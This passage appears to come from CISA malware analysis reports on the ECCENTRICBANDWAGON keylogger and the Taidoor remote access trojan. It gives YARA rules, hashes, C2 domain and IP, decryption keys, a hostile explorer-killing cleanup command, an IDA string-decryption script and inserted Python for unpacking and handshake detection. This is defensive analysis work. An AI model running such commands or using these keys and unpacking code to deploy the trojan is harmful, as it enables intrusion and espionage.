           Category = "Backdoor Keylogger Reconnaissance Screen-Capture Spyware Trojan"
           Family = "ECCENTRICBANDWAGON"
           Description = "Detects strings in ECCENTRICBANDWAGON proxy tool"
           MD5_1 = "d45931632ed9e11476325189ccb6b530"
           SHA256_1 = "efd470cfa90b918e5d558e5c8c3821343af06eedfd484dfeb20c4605f9bdc30e"
           MD5_2 = "acd15f4393e96fe5eb920727dc083aed"
           SHA256_2 = "32a4de070ca005d35a88503717157b0dc3f2e8da76ffd618fca6563aec9c81f8"
           MD5_3 = "34404a3fb9804977c6ab86cb991fb130"
           SHA256_3 = "c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec"
           MD5_4 = "3122b0130f5135b6f76fca99609d5cbe"
           SHA256_4 = "9ea5aa00e0a738b74066c61b1d35331170a9e0a84df1cc6cef58fd46a8ec5a2e"
       strings:
           $sn1 = { FB 19 9D 57 [1-6] 9A D1 D6 D1 [1-6] 42 9E D8 FD }
           $sn2 = { 4F 03 43 83 [1-6] 48 E0 1A 2E [1-6] 3B FD FD FD }
           $sn3 = { 68 56 68 9A [1-12] 4D E1 1F 25 [1-12] 3F 38 54 0F [1-12] 73 30 62 A1 [1-12] DB 39 BD 56 }
           $sn4 = "%s\\chromeupdater_ps_%04d%02d%02d_%02d%02d%02d_%03d_%d" wide ascii nocase
           $sn5 = "c:\\windows\\temp\\TMP0389A.tmp" wide ascii nocase
       condition:
           any of them
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-04-08 07:26:25-04:00
Import Hash b113cba285f3c4ed179422f54692f4e3
PE Sections
MD5 Name Raw Size Entropy
fd81e5f6ab156dcdba2e2b92826ca192 header 1024 3.015020
88ecd4fac45e45b294de415ca514a93c .text 137728 6.457660
af0dab081123c1ad835c86f134138e7f .rdata 57344 5.118317
e7c661026f7ecf701bbcbdd15ff2b825 .data 3584 2.244033
4b406030a4a3dcaea845c14124010691 .pdata 8192 5.172064
f623a10ca467aac404ec6fda8e4810d4 .gfids 512 2.000422
3695113543a23c53791caa70b4bd8874 .rsrc 512 4.724729
f9f31f1689409c8834b7f0c28d948a65 .reloc 2048 4.924204
Description

This sample is nearly identical to “c6930e298bba86c01d0fe2c8262c46b4fce97c6c5037a193904cfc634246fbec” with the exception that it RC4 encrypts some of its strings, uses different log files, and has a simple cleanup routine.

The following strings are RC4 encrypted with the key “key”:

–Begin RC4 encrypted strings–
TrendMicroUpdate
c:\windows\temp\TMP0389A.tmp
c:\windows\temp\tmp1105.tmp
[CLIPBOARD]
[/CLIPBOARD]
–End RC4 encrypted strings–

This malware uses 3 files to store the key logs, screenshots, and log intervals. The locations of these logs can be found in C:\windows\temp\TMP0389A.tmp.

–Begin log files–
1. Keylog: %temp%\TrendMicroUpdate\update_<USERNAME>
2. Screenshots: %temp%\TrendMicroUpdate\update_<MMDD>_<HHMMSSl>
3. Log Intervals: c:\windows\temp\tmp1105.tmp
–End log files–

This malware creates 3 threads to populate the log files listed above. Each one continues to execute until the file C:\windows\temp\tmp0207 contains a zero in a particular location. At this point, the program signals an exit to the other threads and begins a cleanup thread. The cleanup thread deletes C:\windows\temp\tmp0207 and then calls WinExec(“cmd.exe /c taskkill /f /im explorer.exe”). This will crash explorer.exe, which could potentially alert a user who was using the device at the time.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • August 26, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 3, 2020

Detection and Response

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD). Working with U.S. Government partners, CISA, FBI, and DoD identified a malware variant used by Chinese government cyber actors, which is known as TAIDOOR. For more information on Chinese malicious cyber activity, please visit https[:]//www[.]us-cert.gov/china.

FBI has high confidence that Chinese government actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. CISA, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to Chinese government malicious cyber activity.

This MAR includes suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to the Cybersecurity and Infrastructure Security Agency (CISA) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.

Malicious binaries identified as x86 and x64 versions of Taidoor were submitted for analysis. Taidoor is installed on a target’s system as a service dynamic link library (DLL) and consists of two files. The first file is a loader, which is started as a service. The loader decrypts the second file, the main Remote Access Trojan (RAT), and executes it in memory.

For a downloadable copy of IOCs, see MAR-10292089-1.v1.stix.

Submitted Files (4)

0d0ccfe7cd476e2e2498b854cef2e6f959df817e52924b3a8bcdae7a8faaa686 (svchost.dll)

363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90 (svchost.dll)

4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4 (ml.dll)

6e6d3a831c03b09d9e4a54859329fbfd428083f8f5bc5f27abbfdd9c47ec0e57 (rasautoex.dll)

Domains (1)

cnaweb.mrslove.com

IPs (1)

210.68.69.82

Findings

4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4

Tags

loader

Details
Name ml.dll
Size 43520 bytes
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 6aa08fed32263c052006d977a124ed7b
SHA1 9a6795333e3352b56a8fd506e463ef634b7636d2
SHA256 4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4
SHA512 179e9d9ccbc268cc94a7f6d31f29cf0f7a163db829a4557865f3c1f98614f94ceb7b90273d33eb49ef569cfc9013b76c7de32d7511639a7ab2c352f3137d51b6
ssdeep 768:uGRVnBnwS5kBKsl4anxKFhx3W3kGmifmUED7Bn5f6dBywFmZb:fDeSnbx3okvxVwFI
Entropy 5.864467
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-01-03 07:16:12-05:00
Import Hash dbb469cb14550e6085a14b4b2d41ede9
PE Sections
MD5 Name Raw Size Entropy
62ab3bae7859f6f6dc68366d283ad53e header 1024 2.511204
63550f7c47453c2809834382e228637d .text 23040 6.442964
a30bb3ac9b6694a8980c39c0267c9a83 .rdata 11264 4.926331
ad5814673b8579de78be5b6b929d2405 .data 3072 2.629944
619ecca9c8d1073a0b90f5fffac42ec8 .rsrc 512 5.105029
0f292021853e7ca76c4196bcbe9afdaf .reloc 4608 3.712197
Packers/Compilers/Cryptors
Microsoft Visual C++ DLL *sign by CodeRipper
Relationships
4a0688baf9… Used 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
Description

This file is a 32-bit Windows DLL file. The file “ml.dll” is a Taidoor loader. The file utilizes the export function called “MyStart” to decrypt and load “svchost.dll” (8CF683B7D181591B91E145985F32664C), which was identified as Taidoor malware. Taidoor is a traditional RAT.

The “MyStart” function looks for the file name “svchost.dll” in its running directory. If that file is located, the DLL reads “svchost.dll” into memory. After the file is read into memory, the DLL uses an RC4 algorithm to decrypt the contents of the file. The RC4 key used for decryption is “ar1z7d6556sAyAXtUQc2”.

After the loader has finished decrypting “svchost.dll”, it holds a decrypted version of Taidoor, which is a DLL. The loader then uses the API calls GetProcessHeap, GetProcAddress, and LoadLibrary to load the following DLLs, which Taidoor will utilize: KERNEL32.dll, ADVAPI32.dll, and WS2_32.dll.

Next, the loader looks for the export “Start” in the Taidoor DLL and executes that function.
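The RC4 step that this loader and the ECCENTRICBANDWAGON sample above both rely on, as an added example that is not CISA's code and not the malware's own: pure-Python RC4 with the two keys the report gives (“ar1z7d6556sAyAXtUQc2” for svchost.dll, “key” for the ECCENTRICBANDWAGON strings), followed by an export-directory parse of the decrypted image so an analyst can confirm the payload really is a PE exporting “Start” before loading it in a disassembler. The DLL produced by build_sample_dll() is a constructed stand-in, not a real sample, and the parser assumes an unrelocated on-disk image.

```python
# Added example (not CISA's or the malware author's code): RC4 unpacking
# plus an export-directory check for the loader/payload pair described above.
import struct

TAIDOOR_LOADER_KEY = b"ar1z7d6556sAyAXtUQc2"   # key from the ml.dll analysis
ECCENTRICBANDWAGON_KEY = b"key"                 # key from the ECCENTRICBANDWAGON analysis


def rc4(key, data):
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _rva_to_offset(pe, rva):
    """Map an RVA to a file offset via the section table (on-disk image assumed)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    sec = e_lfanew + 24 + opt_size
    for _ in range(nsections):
        vsize, va, rsize, raw = struct.unpack_from("<IIII", pe, sec + 8)
        if va <= rva < va + max(vsize, rsize):
            return rva - va + raw
        sec += 40
    raise ValueError("RVA 0x%x is outside every section" % rva)


def export_names(pe):
    """Names in the export directory of a PE32 or PE32+ image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image: wrong key or wrong input file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    magic = struct.unpack_from("<H", pe, e_lfanew + 24)[0]
    data_dir = e_lfanew + 24 + (96 if magic == 0x10B else 112)  # DataDirectory[0]
    exp_rva = struct.unpack_from("<I", pe, data_dir)[0]
    if exp_rva == 0:
        return []
    exp = _rva_to_offset(pe, exp_rva)
    n_names = struct.unpack_from("<I", pe, exp + 24)[0]
    name_tbl = _rva_to_offset(pe, struct.unpack_from("<I", pe, exp + 32)[0])
    names = []
    for k in range(n_names):
        off = _rva_to_offset(pe, struct.unpack_from("<I", pe, name_tbl + 4 * k)[0])
        names.append(pe[off:pe.index(b"\0", off)].decode("ascii"))
    return names


def unpack_taidoor(encrypted_svchost):
    """Decrypt an ml.dll-style payload and return the exports of the result."""
    return export_names(rc4(TAIDOOR_LOADER_KEY, encrypted_svchost))


def build_sample_dll():
    """Constructed minimal PE32 DLL exporting "Start"; a stand-in, not a real sample."""
    sec_va, sec_raw, sec_size = 0x1000, 0x200, 0x200
    func_tbl, name_tbl, ord_tbl, s_name, s_dll = 0x28, 0x2C, 0x30, 0x34, 0x3A
    edata = bytearray(sec_size)               # IMAGE_EXPORT_DIRECTORY + tables + strings
    struct.pack_into("<IIHHIIIIIII", edata, 0, 0, 0, 0, 0, sec_va + s_dll, 1, 1, 1,
                     sec_va + func_tbl, sec_va + name_tbl, sec_va + ord_tbl)
    struct.pack_into("<I", edata, func_tbl, sec_va + 0x100)   # RVA of the (dummy) Start()
    struct.pack_into("<I", edata, name_tbl, sec_va + s_name)
    struct.pack_into("<H", edata, ord_tbl, 0)
    edata[s_name:s_name + 6] = b"Start\0"
    edata[s_dll:s_dll + 12] = b"svchost.dll\0"
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<II", opt, 96, sec_va, 0x40)            # export data directory
    sect = struct.pack("<8sIIIIIIHHI", b".edata", sec_size, sec_va, sec_size, sec_raw,
                       0, 0, 0, 0, 0x40000040)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x2102)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                   # e_lfanew
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect
    return headers.ljust(sec_raw, b"\0") + bytes(edata)
```

On a real encrypted svchost.dll, `unpack_taidoor(open(path, "rb").read())` either returns the export list or raises because the first two bytes are not “MZ”, which is the quickest sign that the key or the file is wrong.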

363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90

Tags

remote-access-trojan

Details
Name svchost.dll
Size 158208 bytes
Type data
MD5 8cf683b7d181591b91e145985f32664c
SHA1 f0a20aaf4d2598be043469b69075c00236b7a89a
SHA256 363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90
SHA512 b75401d591caee812c5c1a669ce03c47f78f1c40a2fa31cf58a0318ffbfc032b82cb1b6d2a599ce1b3547be5a404f55212156640b095f895a9aac3c58ec4bad8
ssdeep 3072:fRxYk0d5+6/kdGyfitoxNsUZE2XZ+4Duz6fCKmjjwF5PaT:JqkoiGiZxE4qRKqgIT
Entropy 7.998691
Antivirus

No matches found.

YARA Rules
  • rule CISA_10292089_01 : rat loader TAIDOOR
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10292089"
           Date = "2020-06-18"
           Last_Modified = "20200616_1530"
           Actor = "n/a"
           Category = "Trojan Loader Rat"
           Family = "TAIDOOR"
           Description = "Detects Taidoor Rat Loader samples"
           MD5_1 = "8cf683b7d181591b91e145985f32664c"
           SHA256_1 = "363ea096a3f6d06d56dc97ff1618607d462f366139df70c88310bbf77b9f9f90"
           MD5_2 = "6627918d989bd7d15ef0724362b67edd"
           SHA256_2 = "0d0ccfe7cd476e2e2498b854cef2e6f959df817e52924b3a8bcdae7a8faaa686"
       strings:
           $s0 = { 8A 46 01 88 86 00 01 00 00 8A 46 03 88 86 01 01 00 00 8A 46 05 88 86 02 01 00 00 8A 46 07 88 86 03 01 00 00 }
           $s1 = { 88 04 30 40 3D 00 01 00 00 7C F5 }
           $s2 = { 0F BE 04 31 0F BE 4C 31 01 2B C3 2B CB C1 E0 04 0B C1 }
           $s3 = { 8A 43 01 48 8B 6C 24 60 88 83 00 01 00 00 8A 43 03 }
           $s4 = { 88 83 01 01 00 00 8A 43 05 88 83 02 01 00 00 8A 43 07 88 83 03 01 00 00 }
           $s5 = { 41 0F BE 14 7C 83 C2 80 41 0F BE 44 7C 01 83 C0 80 C1 E2 04 0B D0 }
           $s6 = { 5A 05 B2 CB E7 45 9D C2 1D 60 F0 4C 04 01 43 85 3B F9 8B 7E }
       condition:
           ($s0 and $s1 and $s2) or ($s3 and $s4 and $s5) or ($s6)
    }
ssdeep Matches

No matches found.

Relationships
363ea096a3… Used_By 4a0688baf9661d3737ee82f8992a0a665732c91704f28688f643115648c107d4
363ea096a3… Connected_To cnaweb.mrslove.com
363ea096a3… Connected_To 210.68.69.82
Description

This encrypted file has been identified as the Taidoor RAT loaded by “ml.dll” (6AA08FED32263C052006D977A124ED7B). After the loader has finished decrypting this file, it holds a decrypted version of Taidoor, which is a DLL. The loader then uses the API calls GetProcessHeap, GetProcAddress, and LoadLibrary to load the following DLLs, which this file will utilize: KERNEL32.dll, ADVAPI32.dll, and WS2_32.dll.

Next, the loader “ml.dll” (6AA08FED32263C052006D977A124ED7B) looks for the export “Start” in the Taidoor DLL and executes that function. Taidoor’s “Start” function kicks off by decrypting a multitude of import strings that it will use to dynamically import functions from the DLLs that have been loaded. A complex stream cipher is used to decrypt the encrypted strings utilized by this malware. The 85 strings include APIs and strings used by other structures, such as a structure capable of allowing the malware to load external plugin payloads. The malware utilizes the following 7-byte key to generate a 256-byte initial stream cipher value: “19 34 F4 D2 E9 B3 0F”.

Next, the algorithm pads the 256-byte initial cipher value out to 260 bytes using 4 bytes already contained within the 256-byte block (Figure 2). The algorithm then processes the encrypted string blocks 2 bytes at a time. Before decryption it compresses each 2-byte pair into 1 byte: 0x80 is subtracted from both the first and the second byte, the result for the first byte is shifted left by four, and the two values are then combined with a bitwise OR, yielding the single byte that the cipher decrypts.

Using a simple Exclusive OR (XOR) operation, the 260-byte block is shuffled and modified to produce the byte that is used to decrypt the newly compressed byte. The decrypted byte is then placed back into the 260-byte cipher block buffer. This produces a recurrent block-shifting effect: the 260-byte cipher block value changes as a result of the sequence of bytes it receives. This is an effective method of thwarting heuristic or brute-force attacks.

Taidoor also uses the AES algorithm to decrypt a 1616-byte configuration file. This configuration file contains the command and control (C2) servers and possibly another encryption key used later. The AES key, in hex, is “2B 7E 15 16 28 AE D2 A6 AB F7 15 88 09 CF 4F 3C”; the IV is “00”.

–Begin C2–
cnaweb.mrslove.com
210.68.69.82
–End C2–

After completing this decryption function, Taidoor iterates through the System Event Log, looking specifically for event IDs 6005 (event service started) and 6006 (event service stopped). After completing its decryption functions, Taidoor tries to connect to its C2 server. Once Taidoor and the C2 server finish the TCP handshake, Taidoor waits for at least one byte of data to be sent from the C2 server. This byte or bytes are not checked by Taidoor; anything can be sent.

After Taidoor has confirmed that it has received at least one byte of data from the server, Taidoor sends a custom-formatted packet over port 443. Note: this packet does not follow the TLS protocol and is easily identifiable. The initial packet sent from Taidoor to the C2 server in this case always starts with “F::” followed by the encryption key that Taidoor and the C2 server will use to encrypt all following communications.

After sending the encryption key to the C2 server, Taidoor expects the server to respond with “200 OK\r\n\r\n”. Note: this response is sent over port 443 but is not encrypted; it is sent in clear text.
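Detection logic for the handshake just described, as an added example that is not part of the report: a TCP flow is modelled as ordered data segments, and the function flags the traits the text gives (server sends data first, no TLS record on 443, a client message starting with “F::”, and a bare “200 OK\r\n\r\n” reply). The sample flows are constructed, and the TLS record-header pattern is an assumption about what benign traffic on 443 looks like.

```python
# Added example (not CISA's code): flow-level detector for the cleartext
# Taidoor C2 handshake on TCP/443 described in the report.
import re

TLS_RECORD = re.compile(rb"\A\x16\x03[\x00-\x04]")  # TLS handshake record header (assumed benign shape)
KEY_PREFIX = b"F::"                                 # implant's first message
SERVER_ACK = b"200 OK\r\n\r\n"                      # bare reply, no HTTP status line


def taidoor_indicators(segments, dport=443):
    """Handshake traits observed in one TCP flow.

    segments: [("c2s" | "s2c", payload_bytes), ...] in wire order, one entry per
    data segment.  Returns trait names in the order they were observed.
    """
    traits = []
    if dport != 443 or not segments:
        return traits
    if segments[0][0] == "s2c":
        traits.append("server-speaks-first")       # a TLS client always talks first
    client = [p for d, p in segments if d == "c2s"]
    if client and not TLS_RECORD.match(client[0]):
        traits.append("non-tls-on-443")
    for direction, payload in segments:
        if direction == "c2s" and payload.startswith(KEY_PREFIX):
            traits.append("plaintext-key-exchange")
        elif direction == "s2c" and payload.startswith(SERVER_ACK):
            traits.append("bare-200-ok-ack")
    return traits


def is_taidoor_handshake(segments, dport=443):
    """True when both the "F::" key message and the bare "200 OK" ack are present."""
    seen = set(taidoor_indicators(segments, dport))
    return {"plaintext-key-exchange", "bare-200-ok-ack"} <= seen


def session_key(segments):
    """The key the implant offered after "F::", or None if no such message."""
    for direction, payload in segments:
        if direction == "c2s" and payload.startswith(KEY_PREFIX):
            return payload[len(KEY_PREFIX):]
    return None


# Constructed sample flows (not captures from the incident).
TAIDOOR_FLOW = [
    ("s2c", b"\x01"),                              # server sends an arbitrary byte first
    ("c2s", b"F::" + b"SAMPLEKEY0123456"),         # implant offers the session key
    ("s2c", b"200 OK\r\n\r\n"),                    # server acknowledges in the clear
]
TLS_FLOW = [
    ("c2s", b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03" + b"\x00" * 32),
    ("s2c", b"\x16\x03\x03\x00\x5a\x02\x00\x00\x56\x03\x03"),
]
HTTP_FLOW = [
    ("c2s", b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"),
    ("s2c", b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
]

if __name__ == "__main__":
    for name, flow in (("taidoor", TAIDOOR_FLOW), ("tls", TLS_FLOW), ("http", HTTP_FLOW)):
        print(name, taidoor_indicators(flow), is_taidoor_handshake(flow))
```

Plain HTTP on 443 only earns the weak "non-tls-on-443" trait, so the alert condition keys on the two protocol-specific traits rather than on the absence of TLS alone.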

After Taidoor has successfully connected to its C2, it creates a Windows INI configuration file, and copies cmd.exe into the system temp folder.

–Begin Windows INI file created–
C:\ProgramData\Microsoft\~svc_.TMp
–End Windows INI file created–

–Begin contents of INI file–
[Micros]
source=c:\temp\cmd.exe
–End contents of INI file–

Note: Taidoor does not have a function built in that enables it to persist past a system reboot. From the memory dump of the infected system, it appears it was installed as a service DLL by some other means.

The malware author never removed the symbol file path from the “ml.dll” build. This artifact provides additional information about what the malware author intended this binary to do: “DllHijackPlushInject”.

–Begin symbol file artifact–
c:\Users\user\Desktop\DllHijackPlushInject\version\Release\MemoryLoad.pdb
–End symbol file artifact–

The following IDA script can be used to decrypt all the encrypted strings and demonstrates how a sequence of bytes is encrypted using the initial 260-byte cipher block generated from the key value “19 34 F4 D2 E9 B3 0F”:

–Begin IDA script–
import os
import sys
import idaapi
import idc
from idc import SetColor, MakeComm, GetMnem, GetOpnd, GetOperandValue, CIC_ITEM  # pre-7.4 IDA API names
from idautils import XrefsTo

cwd = os.getcwd()
cwd = '/Users/terminator/PycharmProjects/rc4_test//'  # analyst's working directory; overrides getcwd()
cipherblock = []
pb_fname = cwd + "//" + 'pristine_block.bin'          # dump of the initial (padded) cipher block
es_fname = cwd + "//" + 'encrypted_strings.bin'       # dump of the encrypted string table
secure_strings_func = 0x10003cb7                      # string-decryption routine in the IDB
encrypted_strings_block = 0x1001c434                  # encrypted string table in the IDB
enc_string_size = 2875                                # size of that table in bytes
global_decrypted_stringz = []

read_bitez = b""
try:
    fh = open(pb_fname, 'rb')
    read_bitez = fh.read()
    fh.close()
except Exception as e:
    print("Couldn't read filename. Reading from code (Attempt)")  # no fallback: cipherblock stays empty
for idx in bytearray(read_bitez):  # convert them to ints to do the math!
    cipherblock.append(idx)
print("Cipher Block len: " + str(len(cipherblock)))


def decrypt(encrypted_string, cipherblock):  # **CALL THIS FUNC to decrypt stuff!
    string_len = len(encrypted_string) // 2   # two encoded bytes per plaintext byte
    throttle = 0
    da_string = ""
    while throttle < string_len:
        cipherblock, decoded_byte = decrypt_it(cipherblock, encrypted_string, throttle)
        if throttle:  # the first decoded byte is not part of the string
            da_string += chr(decoded_byte)
        throttle += 1  # INCREMENT before doing the compare
    global_decrypted_stringz.append(da_string)
    return da_string


def decrypt_it(cipherblock, encoded_data, throttle):
    ebx = 128  # *0x80
    ecx = throttle
    ecx = ecx + ecx                    # offset of the 2-byte pair
    eax = encoded_data[ecx]
    ecx = encoded_data[ecx + 1]
    eax = eax - ebx                    # strip 0x80 from both bytes
    ecx = ecx - ebx
    eax = eax << 4                     # first byte supplies the high nibble,
    eax = eax | ecx                    # second byte the low nibble
    cipherblock, decoded_byte = outter_shuffle_func(cipherblock, eax)
    return cipherblock, decoded_byte


def outter_shuffle_func(cipherblock, encoded_bite):
    # before inner func
    cipherblock = inner_shuffle_func(cipherblock)
    # after inner func (indices 256..260 hold the cipher's state bytes)
    eax = cipherblock[258]
    ecx = cipherblock[eax]
    eax = cipherblock[260]
    eax = cipherblock[eax]
    edx = cipherblock[257]
    edi = cipherblock[256]
    edx = cipherblock[edx]
    edi = cipherblock[edi]
    ecx = eax + ecx
    eax = cipherblock[259]
    eax = cipherblock[eax]
    ecx = eax + ecx
    eax = 255
    ecx = ecx & eax
    ecx = cipherblock[ecx]
    cl = cipherblock[ecx]
    edx = edx + edi
    edx = edx & eax
    cl = cipherblock[edx] ^ cl  # **actual manipulation here
    al = encoded_bite
    cl = cl ^ al
    cipherblock[260] = al
    cipherblock[259] = cl
    al = cl
    decoded_byte = al
    return cipherblock, decoded_byte


def wrap_around_strip(da_byte):
    # keep only the low byte, as a byte register would
    return da_byte & 0xFF


def add_bites(a, b):
    for_return = a + b
    for_return = wrap_around_strip(for_return)
    return for_return


def inner_shuffle_func(cipherblock_orig):  # *SHUFFLE The cipher block here!
    cipherblock = []
    for idx in cipherblock_orig:  # lets make a copy!
        cipherblock.append(idx)
    al = cipherblock[256]
    esi = cipherblock[260]
    dl = cipherblock[esi]
    al = al & 0xffffff
    edi = al
    bl = cipherblock[edi]
    da_byte = cipherblock[257]
    da_byte = add_bites(da_byte, bl)
    cipherblock[257] = da_byte
    al = wrap_around_strip(al + 1)  # byte counter, wraps at 256
    cipherblock[256] = al
    eax = cipherblock[257]
    al = cipherblock[eax]
    cipherblock[esi] = al
    esi = cipherblock[259]
    bl = cipherblock[esi]
    edi = cipherblock[257]
    cipherblock[edi] = bl
    esi = cipherblock[256]
    eax = cipherblock[259]
    bl = cipherblock[esi]
    cipherblock[eax] = bl
    eax = cipherblock[256]
    cipherblock[eax] = dl
    eax = dl
    al = cipherblock[eax]
    temp_byte = cipherblock[258]
    temp_byte = add_bites(temp_byte, al)
    cipherblock[258] = temp_byte
    return cipherblock


def decode_from_addr(target_addr, label_loc, pointer_addr, label_them):
    init_bitez = []
    while True:
        temp_bite = idaapi.get_byte(target_addr)
        if not temp_bite:  # strings are NUL-terminated
            break
        init_bitez.append(temp_bite)
        target_addr += 1
    ord_bitez = list(init_bitez)
    cipher_block_copy = list(cipherblock)  # every string starts from the pristine block
    dec_string = decrypt(ord_bitez, cipher_block_copy)
    if label_them:
        SetColor(label_loc, CIC_ITEM, 0xc7c7ff)
        MakeComm(label_loc, dec_string)
        SetColor(pointer_addr, CIC_ITEM, 0xc7c7ff)
        MakeComm(pointer_addr, dec_string)
    print(dec_string)


def find_initial_loc(target_addr):
    # walk backwards from the call to find the "push off_xxx" that supplies the string pointer
    addr = target_addr
    give_up = 5
    attempts = 0
    while True:
        addr = idc.PrevHead(addr)
        if GetMnem(addr) == "push" and "off_" in GetOpnd(addr, 0):
            string_addr = GetOperandValue(addr, 0)
            print("Found String Loc: " + str(hex(string_addr)))
            pointer_addr = idaapi.get_dword(string_addr)
            print(hex(pointer_addr))
            decode_from_addr(pointer_addr, addr, string_addr, 1)
            return string_addr
        attempts += 1
        if attempts == give_up:
            return 0


enc_stringz_data = []
try:
    fh = open(es_fname, 'rb')
    da_data = fh.read()
    fh.close()
    for idx in bytearray(da_data):
        enc_stringz_data.append(idx)
except Exception as e:
    print("Couldn't read encrypted strings file. Reading from Malware!")
    addr_throttle = encrypted_strings_block
    while len(enc_stringz_data) < enc_string_size:
        x = idaapi.get_byte(addr_throttle)
        enc_stringz_data.append(x)
        addr_throttle += 1  # advance, otherwise the same byte is read every time
encrypted_stringz = []  # *list of lists
temp_string = []
for idx in enc_stringz_data:  # split the table on NUL bytes
    if idx:
        temp_string.append(idx)
    if not idx:
        if len(temp_string):
            encrypted_stringz.append(temp_string)
        temp_string = []
decrypted_stringz = []
debug_it = False
if debug_it:  # decrypt the whole table from the dump without touching the IDB
    for enc_string in encrypted_stringz:
        cipher_block_copy = list(cipherblock)
        dec_string = decrypt(enc_string, cipher_block_copy)
        decrypted_stringz.append(dec_string)
    print("-" * 22)
    for idx in decrypted_stringz:
        print(idx)
    print("Complete")
addresses_to = []
for addr in XrefsTo(secure_strings_func):  # every call site of the decryption routine
    print("---------")
    print(hex(addr.frm))
    find_initial_loc(addr.frm)
    print("---------")
    print("\n")
    addresses_to.append(addr.frm)
print("IDA IDB Labeled. Decrypted Strings Below:")
print("-" * 29)
for idx in global_decrypted_stringz:
    print(idx)
–End IDA script–

Strings decrypted by the IDA script are displayed below:

–Begin decrypted strings–
kernel32.dll
InitializeCriticalSection
GetLocalTime
LeaveCriticalSection
GetModuleFileNameA
Sleep
ExpandEnvironmentStringsA
GetSystemTime
SystemTimeToFileTime
GetTickCount
CreatePipe
